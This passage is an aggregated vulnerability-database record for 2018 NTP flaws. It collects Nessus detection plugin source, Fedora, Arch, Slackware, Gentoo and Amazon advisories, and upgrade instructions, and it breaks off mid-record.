script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p11\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-01T03:07:22", "description": "The remote host is affected by the vulnerability described in GLSA-201805-12\n(NTP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in NTP. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code or cause a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-29T00:00:00", "title": "GLSA-201805-12 : NTP: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:ntp"], "id": "GENTOO_GLSA-201805-12.NASL", "href": "https://www.tenable.com/plugins/nessus/110176", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201805-12.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110176);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_xref(name:\"GLSA\", value:\"201805-12\");\n\n script_name(english:\"GLSA-201805-12 : NTP: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201805-12\n(NTP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in NTP. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code or cause a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201805-12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All NTP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/ntp-4.2.8_p11'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/ntp\", unaffected:make_list(\"ge 4.2.8_p11\"), vulnerable:make_list(\"lt 4.2.8_p11\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"NTP\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. ", "modified": "2018-03-27T19:30:28", "published": "2018-03-27T19:30:28", "id": "FEDORA:D24F26076D26", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: ntp-4.2.8p11-1.fc26", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-12327", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. ", "modified": "2018-09-26T20:17:54", "published": "2018-09-26T20:17:54", "id": "FEDORA:B80B9607548F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: ntp-4.2.8p12-1.fc27", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. ", "modified": "2018-08-30T04:57:33", "published": "2018-08-30T04:57:33", "id": "FEDORA:D00D36075DA4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: ntp-4.2.8p12-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170", "CVE-2019-8936"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. ", "modified": "2019-04-07T01:47:38", "published": "2019-04-07T01:47:38", "id": "FEDORA:B6F06606E5A6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: ntp-4.2.8p13-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "description": "Arch Linux Security Advisory ASA-201803-11\n==========================================\n\nSeverity: High\nDate : 2018-03-16\nCVE-ID : CVE-2016-1549 CVE-2018-7170 CVE-2018-7182 CVE-2018-7183\nCVE-2018-7184 CVE-2018-7185\nPackage : ntp\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-647\n\nSummary\n=======\n\nThe package ntp before version 4.2.8.p11-1 is vulnerable to multiple\nissues including arbitrary code execution, content spoofing and denial\nof service.\n\nResolution\n==========\n\nUpgrade to 4.2.8.p11-1.\n\n# pacman -Syu \"ntp>=4.2.8.p11-1\"\n\nThe problems have been fixed upstream in version 4.2.8.p11.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-1549 (content spoofing)\n\nA malicious authenticated peer can create arbitrarily-many ephemeral\nassociations in order to win the clock selection algorithm in ntpd in\nNTP 4.2.8p4 and earlier and NTPsec\n3e160db8dc248a0bcb053b56a80167dc742d2b74 and\na5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim's clock.\n\n- CVE-2018-7170 (content spoofing)\n\nntpd can be vulnerable to Sybil attacks. If a system is set up to use a\ntrustedkey and if one is not using the feature introduced in\nntp-4.2.8p6 allowing an optional 4th field in the ntp.keys file to\nspecify which IPs can serve time, a malicious authenticated peer --\ni.e. one where the attacker knows the private symmetric key -- can\ncreate arbitrarily-many ephemeral associations in order to win the\nclock selection of ntpd and modify a victim's clock.\n\n- CVE-2018-7182 (denial of service)\n\nctl_getitem() is used by ntpd to process incoming mode 6 packets. A\nmalicious mode 6 packet can be sent to an ntpd instance, and if the\nntpd instance is from 4.2.8p6 thru 4.2.8p10, that will cause\nctl_getitem() to read past the end of its buffer.\n\n- CVE-2018-7183 (arbitrary code execution)\n\nntpq is a monitoring and control program for ntpd. decodearr() is an\ninternal function of ntpq that is used to -- wait for it -- decode an\narray in a response string when formatted data is being displayed. This\nis a problem in affected versions of ntpq if a maliciously-altered ntpd\nreturns an array result that will trip this bug, or if a bad actor is\nable to read an ntpq request on its way to a remote ntpd server and\nforge and send a response before the remote ntpd sends its response.\nIt's potentially possible that the malicious data could become\ninjectable/executable code.\n\n- CVE-2018-7184 (denial of service)\n\nThe fix for NtpBug2952 was incomplete, and while it fixed one problem\nit created another. Specifically, it drops bad packets before updating\nthe \"received\" timestamp. This means a third-party can inject a packet\nwith a zero-origin timestamp, meaning the sender wants to reset the\nassociation, and the transmit timestamp in this bogus packet will be\nsaved as the most recent \"received\" timestamp. The real remote peer\ndoes not know this value and this will disrupt the association until\nthe association resets.\n\n- CVE-2018-7185 (denial of service)\n\nThe NTP Protocol allows for both non-authenticated and authenticated\nassociations, in client/server, symmetric (peer), and several broadcast\nmodes. In addition to the basic NTP operational modes, symmetric mode\nand broadcast servers can support an interleaved mode of operation. In\nntp-4.2.8p4 a bug was inadvertently introduced into the protocol engine\nthat allows a non-authenticated zero-origin (reset) packet to reset an\nauthenticated interleaved peer association. If an attacker can send a\npacket with a zero-origin timestamp and the source IP address of the\n\"other side\" of an interleaved association, the 'victim' ntpd will\nreset its association. The attacker must continue sending these packets\nin order to maintain the disruption of the association. In ntp-4.0.0\nthru ntp-4.2.8p6, interleave mode could be entered dynamically. As of\nntp-4.2.8p7, interleaved mode must be explicitly configured/enabled.\n\nImpact\n======\n\nA remote, non-authenticated peer can cause a denial of service,\npreventing the vulnerable host from getting a correct time. In addition\nto that, a remote, authenticated peer can spoof the correct time,\ncausing the vulnerable host to update its clock with an invalid time.\nA malicious NTPd server, or an attacker in position of man-in-the-\nmiddle might be able to execute arbitrary code on the affected host by\nforging a response to an ntpq request.\n\nReferences\n==========\n\nhttp://support.ntp.org/bin/view/Main/NtpBug3012\nhttp://support.ntp.org/bin/view/Main/NtpBug3415\nhttp://support.ntp.org/bin/view/Main/NtpBug3412\nhttp://support.ntp.org/bin/view/Main/NtpBug3414\nhttp://support.ntp.org/bin/view/Main/NtpBug3453\nhttp://support.ntp.org/bin/view/Main/NtpBug3454\nhttps://security.archlinux.org/CVE-2016-1549\nhttps://security.archlinux.org/CVE-2018-7170\nhttps://security.archlinux.org/CVE-2018-7182\nhttps://security.archlinux.org/CVE-2018-7183\nhttps://security.archlinux.org/CVE-2018-7184\nhttps://security.archlinux.org/CVE-2018-7185", "modified": "2018-03-16T00:00:00", "published": "2018-03-16T00:00:00", "id": "ASA-201803-11", "href": "https://security.archlinux.org/ASA-201803-11", "type": "archlinux", "title": "[ASA-201803-11] ntp: multiple issues", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7184", "CVE-2018-7185"], "description": "New ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz: Upgraded.\n This release addresses five security issues in ntpd:\n * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability:\n ephemeral association attack. While fixed in ntp-4.2.8p7, there are\n significant additional protections for this issue in 4.2.8p11.\n Reported by Matt Van Gundy of Cisco.\n * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer\n read overrun leads to undefined behavior and information leak.\n Reported by Yihan Lian of Qihoo 360.\n * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\n ephemeral associations. Reported on the questions@ list.\n * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode\n cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat.\n * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet\n can reset authenticated interleaved association.\n Reported by Miroslav Lichvar of Red Hat.\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n01c86ddfabec68d52877336258d064c7 ntp-4.2.8p11-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nb2d36d96f9a4d84df3586d38b8b47389 ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n78b4e9221e725dcb45160950bfc926d0 ntp-4.2.8p11-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0d32ed484e02ad28c59838e6407d549 ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n81690d8e511b403f0fe89c1d120f5049 ntp-4.2.8p11-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nd2c877e3d1b9c7ce003ef090c7610c74 ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nc3ee95d3944b09c2e891883dc5411a6f n/ntp-4.2.8p11-i586-1.txz\n\nSlackware x86_64 -current package:\nfa9c7a8aca0c769791e34a8e48e6d260 n/ntp-4.2.8p11-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n > sh /etc/rc.d/rc.ntpd restart", "modified": "2018-03-01T23:49:07", "published": "2018-03-01T23:49:07", "id": "SSA-2018-060-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.511203", "type": "slackware", "title": "[slackware-security] ntp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-10-25T16:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1549", "CVE-2018-12327"], "description": "New ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/ntp-4.2.8p12-i586-1_slack14.2.txz: Upgraded.\n This release improves on one security fix in ntpd:\n LOW/MEDIUM: Sec 3012: Sybil vulnerability: ephemeral association attack\n While fixed in ntp-4.2.8p7 and with significant additional protections for\n this issue in 4.2.8p11, ntp-4.2.8p12 includes a fix for an edge case in\n the new noepeer support. Originally reported by Matt Van Gundy of Cisco.\n Edge-case hole reported by Martin Burnicki of Meinberg.\n And fixes another security issue in ntpq and ntpdc:\n LOW: Sec 3505: The openhost() function used during command-line hostname\n processing by ntpq and ntpdc can write beyond its buffer limit, which\n could allow an attacker to achieve code execution or escalate to higher\n privileges via a long string as the argument for an IPv4 or IPv6\n command-line parameter. NOTE: It is unclear whether there are any common\n situations in which ntpq or ntpdc is used with a command line from an\n untrusted source. Reported by Fakhri Zulkifli.\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#August_2018_ntp_4_2_8p12_NTP_Rel\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12327\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p12-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p12-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p12-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p12-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p12-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p12-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p12-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p12-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n4a4cc8e4dc6964dc4521058ce776ce4e ntp-4.2.8p12-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nd3a0c36c39e1c0cf5e3b8707f948a180 ntp-4.2.8p12-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n7c42e1d9fa476c162be9375a7b662654 ntp-4.2.8p12-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n75472911bb9a76a949c94aa21471f6f0 ntp-4.2.8p12-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n2ecd58c0cb1f6d035b36de9098e0d075 ntp-4.2.8p12-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n96844a4152a8dba26ed73d91662122ce ntp-4.2.8p12-x86_64-1_slack14.2.txz\n\nSlackware -current package:\ndc3f52b871f3edc1a64e2d9ef1649591 n/ntp-4.2.8p12-i586-1.txz\n\nSlackware x86_64 -current package:\necd43289b917c81e682b9b00077c1409 n/ntp-4.2.8p12-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.8p12-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n > sh /etc/rc.d/rc.ntpd restart", "modified": "2018-08-17T17:43:28", "published": "2018-08-17T17:43:28", "id": "SSA-2018-229-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.505174", "type": "slackware", "title": "[slackware-security] ntp", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2018-05-28T01:37:21", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2018-7182"], "description": "### Background\n\nNTP contains software for the Network Time Protocol.\n\n### Description\n\nMultiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll NTP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/ntp-4.2.8_p11\"", "edition": 1, "modified": "2018-05-26T00:00:00", "published": "2018-05-26T00:00:00", "id": "GLSA-201805-12", "href": "https://security.gentoo.org/glsa/201805-12", "title": "NTP: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2020-11-10T12:35:20", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2015-7704", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "**Issue Overview:**\n\nEphemeral association time spoofing additional protection \nntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim&#x27;s clock via a Sybil attack. This issue exists because of an incomplete fix for [CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>).([CVE-2018-7170 __](<https://access.redhat.com/security/cve/CVE-2018-7170>))\n\nInterleaved symmetric mode cannot recover from bad state \nntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the &quot;received&quot; timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for [CVE-2015-7704 __](<https://access.redhat.com/security/cve/CVE-2015-7704>).([CVE-2018-7184 __](<https://access.redhat.com/security/cve/CVE-2018-7184>))\n\nEphemeral association time spoofing \nA malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win the clock selection algorithm in ntpd in NTP 4.2.8p4 and earlier and NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 and a5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim&#x27;s clock.([CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>))\n\nBuffer read overrun leads information leak in ctl_getitem() \nThe ctl_getitem method in ntpd in ntp-4.2.8p6 before 4.2.8p11 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted mode 6 packet with a ntpd instance from 4.2.8p6 through 4.2.8p10. ([CVE-2018-7182 __](<https://access.redhat.com/security/cve/CVE-2018-7182>))\n\nUnauthenticated packet can reset authenticated interleaved association \nThe protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the &quot;other side&quot; of an interleaved association causing the victim ntpd to reset its 